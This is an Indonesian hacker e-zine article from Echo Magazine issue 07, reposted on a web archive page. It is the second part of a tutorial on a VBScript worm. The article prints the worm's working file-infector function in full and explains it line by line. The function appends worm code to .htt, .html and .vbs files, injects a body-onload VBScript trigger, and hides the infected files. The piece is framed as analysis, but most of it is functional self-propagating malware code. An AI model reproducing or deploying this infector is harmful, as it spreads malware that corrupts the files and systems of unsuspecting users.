Copy Link
Add to Bookmark
Report

Echo Magazine Issue 07 Phile 0x014

eZine's profile picture
Published in 
Echo Magazine
 · 4 years ago

  


____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/


.OR.ID
ECHO-ZINE RELEASE
07

Author: knot |syuhada@antizionist.cjb.net
Online @ www.echo.or.id :: http://ezine.echo.or.id


== SECTION II ==


hai selamat datang di tutorial ke2 saya. melanjutkan tulisan saya yang
pertama, dalam tulisan ini saya masih akan berusaha menjelaskan tentang
vbsworm. setelah pada tutorial pertama saya yang telah menjelaskan
tentang bagaimana membalik alur deskripsi worm yang terenkripsi untuk
mendapatkan full source code.

tekhnik2 yang saya gunakan dalam menyingkap source code vbsworm secara
logika dapat diterapkan ke semua worm vbs yang terenkripsi karena kesemuanya
mengandung logika yang sama. maka untuk itulah saya sangat menganjurkan
kepada anda untuk mencoba mengerti baris demi baris, kode demi kode yang
telah anda tulis ke dalam worm.

dalam tutor ini saya akan membahas fungsi KLAppendTo() yang merupakan bagian
pertama dalam worm
yang telah saya bahas terdahulu.

------- start code -----

[Function KLAppendTo()]

--------
Function KJAppendTo(FilePath,TypeStr)
On Error Resume Next
Set ReadTemp = FSO.OpenTextFile(FilePath,1)
TmpStr = ReadTemp.ReadAll
If Instr(TmpStr,"KJ_start()") <> 0 Or Len(TmpStr) < 1 Then
ReadTemp.Close
Exit Function
End If
If TypeStr = "htt" Then
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath,2)
FileTemp.Write "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & TmpStr & vbCrLf & HtmlText
FileTemp.Close
Set FAttrib = FSO.GetFile(FilePath)
FAttrib.attributes = 34
Else
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath,8)
If TypeStr = "html" Then
FileTemp.Write vbCrLf & "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
ElseIf TypeStr = "vbs" Then
FileTemp.Write vbCrLf & VbsText
End If
FileTemp.Close
End If
End Function
-------

saya menyebut ini sebagai "Main Infector" knapa? karena fungsi ini bertanggung
jawab atas tingkah worm yang paling menyebalkan, mengkopi dirinya.
fungsi ini akan menginfeksi file2 dengan ekstension .htt .html .vbs sekaligus
menset attribut nya.

plus pada file html menambahkan rutin pengaktifan dalam tag html. <body onload>

-------

Function KJAppendTo(FilePath,TypeStr) <- menyatakan fungsi yang menerima
input berupa variabel FilePath
dan TypeStr.

On Error Resume Next <- Save Point

Set ReadTemp = FSO.OpenTextFile(FilePath,1) <- Baca file

TmpStr = ReadTemp.ReadAll <- mengisi variabel TmpStr dengan
isi dari file Readtemp.

If Instr(TmpStr,"KJ_start()") <> 0 Or Len(TmpStr) < 1 Then
<- baris ini berisi perintah untuk
memanggil fungsi Instr() yang
bertujuan mengidentifikasi file
readTemp adalah worm atau bkn.

ReadTemp.Close <- kalau worm, tutup file.

Exit Function <- keluar dari fungsi.
End If

If TypeStr = "htt" Then <- jika ekstensinya .htt maka..

ReadTemp.Close <- tutup file

Set FileTemp = FSO.OpenTextFile(FilePath,2) <- buka kembali dengan mode
tulis.

FileTemp.Write "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & TmpStr & vbCrLf & HtmlText
<- menulis FileTemp.

FileTemp.Close <- selesai tulis.. tutup file

Set FAttrib = FSO.GetFile(FilePath) <- rubah attribut file (hidden atau read only ,maybe)
FAttrib.attributes = 34

Else <- buat file selain .htt

ReadTemp.Close <- tutup readtemp.

Set FileTemp = FSO.OpenTextFile(FilePath,8) <- buka file dengan mode 8? (is anyone can explain thiz?)

If TypeStr = "html" Then <- kalo .html

FileTemp.Write vbCrLf & "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
<- tulis lah.. virusnya. Variabel Htmltext berisi
kode worm dalam format penginfeksi html. will
explained later.

ElseIf TypeStr = "vbs" Then <- kalo .vbs

FileTemp.Write vbCrLf & VbsText <- tulis lagi virusnya, kalau sudah selesai tutup deh.
End If
FileTemp.Close
End If

End Function <- akhir fungsi.


demikian pembahasan baris per baris rutin ini, sebenarnya tidak ada yang istimewa dari rutin ini.
sama saja seperti rutin2 penginfeksi dari worm2 vbs lain. tapi ini hanya sebagian dari keseluru
han program worm yang saya janjikan untuk dibahas.

mengenai tingkah laku dari worm dalam bagian ini, dapat kita lihat bahwa fungsi ini hanya merupa
kan bagian dari sub routine yang lebih kompleks. fungsi ini mengolah input file dan menginfeksi
nya.

lebih lanjut kita akan membahas lebih dalam mengenai struktur worm ini.


cya

----

syuhada@antizionist.cjb.net

----------

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

guest's profile picture
@guest
12 Nov 2024
It is very remarkable that the period of Atlantis’s destruction, which occurred due to earthquakes and cataclysms, coincides with what is co ...

guest's profile picture
@guest
12 Nov 2024
Plato learned the legend through his older cousin named Critias, who, in turn, had acquired information about the mythical lost continent fr ...

guest's profile picture
@guest
10 Nov 2024
الاسم : جابر حسين الناصح - السن :٤٢سنه - الموقف من التجنيد : ادي الخدمه - خبره عشرين سنه منهم عشر سنوات في كبرى الشركات بالسعوديه وعشر سنوات ...

lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
6 Nov 2024
Thank you! I've corrected the date in the article. However, some websites list January 1980 as the date of death.

guest's profile picture
@guest
5 Nov 2024
Crespi died i april 1982, not january 1980.

guest's profile picture
@guest
4 Nov 2024
In 1955, the explorer Thor Heyerdahl managed to erect a Moai in eighteen days, with the help of twelve natives and using only logs and stone ...

guest's profile picture
@guest
4 Nov 2024
For what unknown reason did our distant ancestors dot much of the surface of the then-known lands with those large stones? Why are such cons ...

guest's profile picture
@guest
4 Nov 2024
The real pyramid mania exploded in 1830. A certain John Taylor, who had never visited them but relied on some measurements made by Colonel H ...

guest's profile picture
@guest
4 Nov 2024
Even with all the modern technologies available to us, structures like the Great Pyramid of Cheops could only be built today with immense di ...

lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
2 Nov 2024
In Sardinia, there is a legend known as the Legend of Tirrenide. Thousands of years ago, there was a continent called Tirrenide. It was a l ...
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT